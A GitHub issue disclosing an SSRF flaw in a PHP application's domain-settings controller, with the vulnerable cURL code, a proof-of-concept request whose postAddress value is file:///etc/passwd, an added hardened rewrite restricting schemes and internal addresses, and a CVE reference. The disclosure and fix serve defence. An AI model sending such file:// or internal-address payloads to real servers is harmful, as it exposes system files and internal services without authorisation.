
There is one SSRF vulnerability that can get some sensitive information

Open Q1ngShan opened this issue 5 years ago • 1 comments

Vulnerability location: app/setting/controller/ApiAdminDomainSettings.php

The problem arises in lines 28-39:

    $ch = curl_init();
    $options = array(
        CURLOPT_URL => $api,
        CURLOPT_POST => true,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_POSTFIELDS => implode("\n", $urls),
        CURLOPT_HTTPHEADER => array('Content-Type: text/plain'),
    );

    curl_setopt_array($ch, $options);

    $result = curl_exec($ch);

Using curl_exec, $api is controllable, and only trim is applied to the $api parameter in the above code, without any filtering; finally, the JSON-encoded data is returned.

PoC:

http://site/index.php?s=/setting/ApiAdminDomainSettings/urlPost

post:
postAddress=file:///etc/passwd&url=xx&id=


Q1ngShan, Sep 29 '19 07:09
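
A hardened form of the request reported above, as an added example that is not part of the original issue or the project's code: it accepts only http/https targets, rejects hosts that resolve to private or reserved addresses, and restricts cURL to the same protocols. The function names `safePushUrl` and `postUrls` are hypothetical.

```php
<?php
// Added example, not the project's code. safePushUrl() and postUrls() are hypothetical names.
function safePushUrl(string $api): ?array
{
    $parts = parse_url(trim($api));
    if (!is_array($parts) || !isset($parts['scheme'], $parts['host']) || isset($parts['user'])) {
        return null;                          // malformed, or carries credentials (parser confusion)
    }
    $scheme = strtolower($parts['scheme']);
    if (!in_array($scheme, ['http', 'https'], true)) {
        return null;                          // rejects file://, gopher://, dict://, ...
    }
    $host = trim($parts['host'], '[]');       // parse_url keeps brackets on IPv6 literals
    $literal = filter_var($host, FILTER_VALIDATE_IP) !== false;
    $ips = $literal ? [$host] : (gethostbynamel($host) ?: []);
    if ($ips === []) {
        return null;                          // does not resolve
    }
    foreach ($ips as $ip) {                   // every resolved address must be public
        if (!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
            return null;                      // loopback, RFC 1918, link-local (169.254.0.0/16), ...
        }
    }
    $port = $parts['port'] ?? ($scheme === 'https' ? 443 : 80);
    // Pin the checked address so cURL cannot re-resolve to a different one (DNS rebinding).
    return ['url' => trim($api), 'pin' => $literal ? [] : ["{$host}:{$port}:{$ips[0]}"]];
}

function postUrls(string $api, array $urls)
{
    $target = safePushUrl($api);
    if ($target === null) {
        throw new InvalidArgumentException('push address rejected');
    }
    $ch = curl_init();
    curl_setopt_array($ch, [
        CURLOPT_URL => $target['url'],
        CURLOPT_POST => true,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_POSTFIELDS => implode("\n", $urls),
        CURLOPT_HTTPHEADER => ['Content-Type: text/plain'],
        CURLOPT_PROTOCOLS => CURLPROTO_HTTP | CURLPROTO_HTTPS,       // cURL itself refuses file:// etc.
        CURLOPT_REDIR_PROTOCOLS => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_FOLLOWLOCATION => false,      // a redirect target would bypass the address check
        CURLOPT_RESOLVE => $target['pin'],
        CURLOPT_TIMEOUT => 10,
    ]);
    return curl_exec($ch);
}
```

If the push endpoint is known in advance, an explicit host allowlist in place of the address-range check is the stricter option.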

CVE-2020-20582 has been assigned for this vulnerability.

fgeek, Jul 09 '21 07:07